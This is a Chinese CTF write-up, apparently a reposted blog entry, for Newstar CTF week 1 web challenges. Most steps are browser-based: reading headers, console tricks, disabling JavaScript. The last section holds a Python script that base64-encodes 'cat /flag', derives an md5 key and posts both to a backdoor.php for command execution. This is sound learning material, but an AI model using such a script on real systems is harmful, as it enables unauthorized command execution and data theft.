自学内容网 自学内容网

2025-1-21 Newstar CTF web week1 wp

week1

headach3

根据提示,在页面的请求头里找到flag
flag{You_Ar3_R3Ally_A_9ooD_d0ctor}

在这里插入图片描述

会赢吗

打开控制台,拿到第一部分flag
在这里插入图片描述
将地址栏改为提示,去到下一关在这里插入图片描述
控制台调用函数,得到flag
在这里插入图片描述
进入第三关,看到与第二关很相似,同样是向一个地方发数据,根据响应拿到flag,但是第二关没有完成该功能的函数,猜测是要自己写一个脚本数据过去
在这里插入图片描述
看题解才发现原来是要修改if指向的条件值在这里插入图片描述
去到第四关,修改设置禁用js,拿到flag,最后将所有flag进行base64解码即可

智械危机

进来看到提示flag跟robots相关,访问robots.txt,(这里为什么要访问这个地址,也是在一次ai的过程里突然理解)得到一个地址,进入在这里插入图片描述
在这里插入图片描述
函数部分的逻辑好理解,接下来解释一下if部分的逻辑在这里插入图片描述
在这里插入图片描述在这里插入图片描述
所以我们所看到的当前网页其实就是else语句执行后的结果
在这里插入图片描述
在题目的源码里,我们可以看到解码后的命令会被执行,因此,可以发送一个获取flag的命令过去,也就是一个webshell

from hashlib import *
from random import  *
from requests import *
from tqdm import *
import uuid
import base64
url='http://127.0.0.1:59206//backd0or.php'
cmd='cat /flag'
base_cmd=base64.b64encode(cmd.encode()).decode()
rev_base_cmd=base_cmd[::-1]
key=base64.b64encode(md5(rev_base_cmd.encode()).hexdigest().encode()).decode()
payload={
    'cmd':base_cmd,
    'key':key
}
responce=post(url,data=payload)
print(responce.text)


原文地址:https://blog.csdn.net/2301_79035389/article/details/145290562

免责声明:本站文章内容转载自网络资源,如侵犯了原著者的合法权益,可联系本站删除。更多内容请关注自学内容网(zxcms.com)!